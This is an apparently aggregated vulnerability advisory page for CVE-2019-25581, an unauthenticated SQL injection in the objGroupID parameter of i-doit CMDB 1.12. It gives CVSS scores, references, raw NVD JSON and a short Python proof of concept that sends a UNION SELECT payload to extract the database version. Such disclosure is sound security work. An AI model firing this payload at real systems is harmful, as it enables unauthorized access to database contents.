CVE-2019-25581

Description

i-doit CMDB 1.12 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the objGroupID parameter. Attackers can send GET requests with crafted SQL payloads in the objGroupID parameter to extract sensitive database information including usernames, database names, and version details.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:i-doit:i-doit:1.12:*:*:*:*:*:*:* - VULNERABLE

i-doit CMDB 1.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli_vuln(target_url):
    # Example payload to extract database version
    # The payload attempts a UNION SELECT to retrieve the version()
    payload = "1' UNION SELECT NULL, NULL, version(), NULL-- -"
    
    params = {
        "objGroupID": payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        # Analyze response to check for database version or SQL errors
        if response.status_code == 200:
            print("Request sent successfully.")
            print("Response snippet:", response.text[:200])
            # Further logic needed to confirm vulnerability based on output
        else:
            print(f"Target returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"Error connecting to target: {e}")

# Usage
# target = "http://<target-ip>/i-doit/"
# check_sqli_vuln(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25581
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25581
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25581/
[4] VulDB https://vuldb.com/cve/CVE-2019-25581
[5] https://netcologne.dl.sourceforge.net/project/i-doit/i-doit/1.12/idoit-open-1.12.zip
[6] https://www.exploit-db.com/exploits/46134
[7] https://www.i-doit.org/
[8] https://www.vulncheck.com/advisories/i-doit-cmdb-sql-injection-via-objgroupid-parameter

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25581", "sourceIdentifier": "[email protected]", "published": "2026-03-21T16:16:02.303", "lastModified": "2026-03-24T20:38:26.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "i-doit CMDB 1.12 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the objGroupID parameter. Attackers can send GET requests with crafted SQL payloads in the objGroupID parameter to extract sensitive database information including usernames, database names, and version details."}, {"lang": "es", "value": "i-doit CMDB 1.12 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados ejecutar consultas SQL arbitrarias inyectando código malicioso a través del parámetro objGroupID. Los atacantes pueden enviar solicitudes GET con cargas útiles SQL manipuladas en el parámetro objGroupID para extraer información sensible de la base de datos, incluyendo nombres de usuario, nombres de bases de datos y detalles de la versión."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:i-doit:i-doit:1.12:*:*:*:*:*:*:*", "matchCriteriaId": "F1C53E9E-B778-432B-B57B-E01116BEEEE4"}]}]}], "references": [{"url": "https://netcologne.dl.sourceforge.net/project/i-doit/i-doit/1.12/idoit-open-1.12.zip", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46134", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.i-doit.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/i-doit-cmdb-sql-injection-via-objgroupid-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}